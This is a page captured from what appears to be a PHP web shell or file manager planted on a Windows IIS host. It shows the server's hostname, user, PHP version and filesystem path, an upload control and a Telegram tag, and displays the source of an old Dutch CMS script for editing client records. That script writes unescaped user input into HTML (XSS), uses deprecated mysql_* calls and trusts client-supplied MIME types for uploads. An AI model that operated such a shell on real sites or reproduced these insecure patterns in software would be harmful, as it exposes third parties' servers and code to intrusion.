HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
$ pwd: D:/HostingSpaces/SBogers10/komma-mediadesign.nl/wwwroot/kms oud/
Upload Files
File: D:/HostingSpaces/SBogers10/komma-mediadesign.nl/wwwroot/kms oud/klant_wijzigen.php
<?php
include_once('resizer.inc.php');

$klant_id = $_GET['klant_id'];

$klant_id = checkData($klant_id);
	
if(!isset($_POST['verzenden'])){
	
	$q_nieuws = sprintf("SELECT kms_klanten.naam, kms_klanten.link, kms_klanten.target, kms_klanten.image_dir FROM kms_klanten WHERE klant_id='%s'", $klant_id);
	$r_nieuws = mysql_query($q_nieuws);
	$rec_nieuws = mysql_fetch_array($r_nieuws);
	
	$naam = html_entity_decode($rec_nieuws['naam']);
	$link = $rec_nieuws['link'];
	$target = $rec_nieuws['target'];
	$image = $rec_nieuws['image_dir'];

}else{
	
	$q_nieuws = sprintf("SELECT kms_klanten.image_dir FROM kms_klanten WHERE klant_id='%s'", $klant_id);
	$r_nieuws = mysql_query($q_nieuws);
	$rec_nieuws = mysql_fetch_array($r_nieuws);
	
	$image = $rec_nieuws['image_dir'];
	
}

if(isset($_POST['verzenden'])){
	$verzenden = true;
}
if(isset($_POST['naam'])){
	$naam = $_POST['naam'];
	$naam = trim($naam);
	$lengte_naam = strlen($naam);
	if(($lengte_naam > 1) && ($lengte_naam < 150)){
		$valid_naam = true;
		$te_lang_naam = false;
	}else{
		$valid_naam = false;
		if($lengte_naam != 0){
			$te_lang_naam = true;
		}
	}
}else{
	$valid_naam = false;
}
if(isset($_POST['link'])){
	$link = $_POST['link'];
	$link = trim($link);
	$lengte_link = strlen($link);
	if(($lengte_link > 1) && ($lengte_link < 250)){
		$valid_link = true;
	}
}else{
	$valid_link = false;
}
if(isset($_POST['target'])){
	$target = $_POST['target'];
	$target = trim($target);
	if(!empty($target)){
		$valid_target = true;	
	}
}else{
	$valid_target = false;
}

if($verzenden && $valid_naam){
	
	$naam_test = checkData($_POST['naam']);
	$test_url = friendlyURL($naam_test);
	
	$q_cases = sprintf("SELECT kms_klanten.url FROM kms_klanten WHERE kms_klanten.url='%s'", $test_url);
	$r_cases = mysql_query($q_cases);
	$rec_cases = mysql_fetch_array($r_cases);
		
	$uitkomst = $rec_cases['url'];
	
	if($test_url == $uitkomst){
		$bestaat_niet = false;	
	}else{
		$bestaat_niet = true;		
	}	
	
	$q_cases2 = sprintf("SELECT kms_klanten.url FROM kms_klanten WHERE klant_id='%s'", $klant_id);
	$r_cases2= mysql_query($q_cases2);
	$rec_cases2 = mysql_fetch_array($r_cases2);
	$org_name = $rec_cases2['url'];
	
	if($test_url == $org_name){
		$bestaat_niet = true;
	}	
}
//check if al bestaat

if($_FILES['image_file']['tmp_name']){
	
	$valid_file = true;
	$extensions = array("image/jpg", "image/jpeg", "image/pjpeg");
	
	if(in_array($_FILES['image_file']['type'], $extensions)) { 
	   $valid_type = true; 
	}else{	
		$valid_type = false;
	}
}else{
	$valid_file = true;
	$valid_type = true;
}


if($verzenden && $valid_naam && $valid_link && $valid_target && $bestaat_niet && $valid_type && !$file_tegroot){

	if($_FILES['image_file']['tmp_name']){
	
		$root = $_SERVER['DOCUMENT_ROOT']."/";
		
		if($valid_file && $_FILES['image_file']['tmp_name']){
			
			$dirname = $image;
			
			$extensions = array("image/jpg", "image/jpeg", "image/pjpeg");
			
			if(in_array($_FILES['image_file']['type'], $extensions)) 
			{ 
				if($_FILES['image_file']['type'] == "image/jpg"){
					$ext = ".jpg";
				}else if($_FILES['image_file']['type'] == "image/jpeg"){
					$ext = ".jpg"; 
				}else if($_FILES['image_file']['type'] == "image/pjpeg"){
					$ext = ".jpg";
				}
			   
		   
			   $picture = $_FILES['image_file']['tmp_name'];
			   
			   list($width, $height) = getimagesize($picture);
			   
			   unlink($root . '/klanten_images/'. $dirname. '/logo.jpg');
			   
				$resizeRatioX = ($width / 400);     
				$resizeRatioY = ($height / 300);
				
				if ($resizeRatioY < $resizeRatioX) {
					$objResize = new RVJ_ImageResize($_FILES['image_file']['tmp_name'], $root . '/klanten_images/'. $dirname . '/logo.jpg', 'W', '284');
				}else {
					$objResize = new RVJ_ImageResize($_FILES['image_file']['tmp_name'], $root . '/klanten_images/'. $dirname . '/logo.jpg', 'W', '284');
				}		   

			}
		}
	}
	
	$url = friendlyURL($naam);
	
	$naam = utf8_decode($naam);
	$naam = htmlentities($naam);
	$naam = checkData($naam);
	
	$link = checkData($link);
	$target = checkData($target);
	
	$q_account = sprintf("UPDATE kms_klanten SET naam = '%s', link = '%s', target = '%s', url = '%s' WHERE kms_klanten.klant_id='%s'", 
	$naam,
	$link,
	$target,
	$url,
	$klant_id);
	
	$r_account = mysql_query($q_account);
	
	
	if($r_account){	
	
		echo("Klant succesvol gewijzigd!<br /><br />");
		echo("<br /><br /><a href=\"index.php?p=klant_overzicht\" title=\"Terug naar het overzicht\">Terug naar het overzicht</a>");
		
	}else{
		echo("Er is iets fout gegaan.");
	}
	
}else{
?>

<h1>Klant wijzigen</h1>
<p>Vul onderstaande gegevens in om deze klant te wijzigen.</p>
<span class="label">* = verplicht</span><br /><br />
<form enctype="multipart/form-data" action="<?php $_SERVER['PHP_SELF']; ?>" id="aanmelden" name="aanmelden" method="post">
    	    
<div>   
        <label>Naam*</label>
		<input name="naam" type="text" value="<?php echo($naam); ?>" />
        <?php if(!$valid_naam && $verzenden){ echo("<span class=\"error\"> (foutieve invoer)</span>"); }?>
        <?php if(!$valid_naam && $verzenden && $te_lang_naam){ echo("<span class=\"error\"><br />(invoer te lang)</span>"); }?>
        <?php if($valid_naam && $verzenden && !$bestaat_niet){ echo("<span class=\"error\"><br />(de naam bestaat al)</span>"); }?><br />
        
        <label>Link *</label>
		<input name="link" type="text" value="<?php echo($link); ?>" />
        <?php if(!$valid_link && $verzenden){ echo("<span class=\"error\"> (foutieve invoer)</span>"); }?><br />
        
        <label>Target *</label>
        <select name="target" >
        	<option></option>
			<option value="_self" <?php if ($target == "_self") { echo("selected=\"selected\"");} ?>>_self</option>
            <option value="_blank" <?php if ($target == "_blank") { echo("selected=\"selected\"");} ?>>_blank</option>
        </select>
        <?php if(empty($target) && $verzenden){ echo("<span class=\"error\"> (selecteer een target)</span>"); }?>

       	<br /><br />
        
       	<label>Foto wijzigen <br />(.jpg)</label>
     	<input class="file_input" type="file" name="image_file" />
       	
        <br />
		<?php if(!$valid_type && !$valid_file && $verzenden && !$file_tegroot){ print("<span class=\"error\"><br />(Selecteer een afbeelding)</span>"); }?>
        <?php if(!$valid_type && $valid_file && $verzenden && !$file_tegroot){ print("<span class=\"error\"><br />(Alleen jpg bestanden)</span>"); }?>
		<?php if($file_tegroot && $verzenden){ print("<span class=\"error\"><br />(Uw bestand is te groot. Max 1 MB)</span>"); }?><br />
         
        <br /><br />
     
        <input name="verzenden" type="submit" value="Wijzigen" class="submit" />
        <a class="submit_annuleren" href="index.php?p=klant_overzicht" title="Annuleren">Annuleren</a>
	</div>
</form>

<?php
}
?>
@ Telegram